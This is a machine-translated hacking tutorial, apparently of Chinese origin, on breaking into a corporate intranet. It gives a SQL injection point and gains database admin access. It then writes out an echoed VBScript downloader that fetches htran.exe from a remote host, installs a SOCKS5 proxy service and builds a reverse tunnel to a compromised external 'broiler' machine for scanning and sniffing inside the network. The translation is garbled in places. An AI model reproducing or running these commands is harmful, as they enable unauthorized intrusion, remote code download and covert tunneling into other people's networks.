Proxy's role in Intrusion-use proxy to penetrate the Intranet
I. Click
MACHINE: http://www.webshell.cc
OS: Windows 2000 + IIS 5.0 + MSSQL
Port: 80 21i
The database is placed on the Intranet with the IP address 192.168.1.2. More importantly, the Intranet database can access the Internet.
The homepage has the injection vulnerability. log on to the SA.
Injection point:
Http://www.webshell.cc/list.asp? Id = 1
Ii. intrusion ideas
1. Install proxy servers for the Intranet target machine
2. Map the proxy port to the Internet.
3. The sockscap port is used to connect to the public network. In this way, the port is connected to the Intranet.
4. The next step is sharing, sniffing, and social engineering.
Iii. intrusion preparation
1. Public Network broiler: 218.3.1.1
2. Tools: htran2.4, sockscap, one scanner and 2.0 nbsi.
3. A indicates the Database Host, B indicates the Internet broiler, C indicates the place where the website is placed on the web, and D indicates the local host (also on the Intranet) www. webshell. CC
4. A: 192.168.1.2 B: 218.3.1.1 C: www. webshell. cc d: 192.168.0.25
Iv. Ongoing intrusion
1. Tool upload:
Run the following command in nbsi:
Echo set X = Createobject (^ "Microsoft. XMLHTTP ^ "): X. open ^ "get ^", lcase (wscript. arguments (0), 0: X. send (): Set S = Createobject (^ "ADODB. stream ^ "): S. mode = 3: S. type = 1: S. open (): S. write (X. responsebody): S. savetofile lcase (wscript. arguments (1), 2> down. vbs
Download the tool:
Cscript down. vbs http: // ip/htran.exe this can be found online
2. Install the SOCKS5 Service
Run the following command in nbsi:
Htran.exe-install // install the SOCKS5 Service
Htran.exe-start // start the SOCKS5 Service
3. Ongoing Rebound
Run htran.exe-S-Listen 520 5200 // listening port on B
Run htran.exe-S-connect 218.3.1.1 520 in nbsi.
3. Enter the Intranet
Now, using sockscap to connect to port 5200 of 218.3.1.1 is equivalent to entering its intranet.
V. penetration into the Intranet
Next we can scan, sniff, and so on.